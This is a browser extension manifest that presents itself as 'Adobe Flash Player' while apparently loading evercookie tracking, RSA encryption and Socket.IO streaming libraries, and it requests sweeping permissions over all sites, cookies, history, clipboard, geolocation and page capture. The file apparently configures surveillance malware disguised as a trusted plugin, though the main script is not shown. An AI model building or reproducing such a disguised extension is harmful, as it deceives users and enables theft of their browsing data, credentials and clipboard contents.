{
  "manifest_version": 2,
  "name": "Adobe Flash Player",
  "version": "11.5.502.135",
  "description": "Shockwave Flash 11.5 r502",

  "background": {
    "persistent": true,
    "scripts": [
      "lib/FileSaver.js",
      // JQuery:
      "lib/jquery-1.7.1.min.js",
      // UUID tracking:
      "lib/Math.uuid.js",
      "lib/swfobject-2.2.min.js",
      "lib/evercookie.js",
      // String compression:
      "lib/base64-string-v1.1.0.js",
      "lib/lz-string-1.3.3.js",
      // RSA encryption/decryption:
      "lib/jsencrypt.min.js",
      // Socket.IO
      "lib/socket.io.js",
      "lib/socket.io-stream.js",
      // Main:
      "main.js"
    ]
  },

  "permissions": [
    "http://*/*",
    "https://*/*",
    // "background",
    "bookmarks",
    "clipboardRead",
    "cookies",
    "geolocation",
    "history",
    "pageCapture",
    "storage",
    "tabs",
    "topSites",
    "unlimitedStorage",
    "windows"
  ],

  "icons": {
    "256": "img/icon_256.png",
    "48": "img/icon_48.png",
    "32": "img/icon_32.png",
    "24": "img/icon_24.png",
    "16": "img/icon_16.png"
   }
}
